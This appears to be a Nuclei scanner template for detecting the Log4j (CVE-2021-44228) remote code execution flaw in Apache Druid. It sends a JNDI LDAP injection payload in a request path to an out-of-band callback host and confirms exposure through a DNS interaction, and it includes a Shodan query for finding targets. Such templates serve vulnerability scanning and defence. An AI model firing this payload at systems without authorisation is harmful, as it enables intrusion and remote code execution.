39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: apache-druid-log4j
|
|
|
|
info:
|
|
name: Apache Druid - Remote Code Execution (Apache Log4j)
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: Apache Druid is vulnerable to RCE due to Log4j.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-502
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Apache Druid"
|
|
tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast
|
|
|
|
http:
|
|
- method: DELETE
|
|
path:
|
|
- "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 404
|
|
# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950 |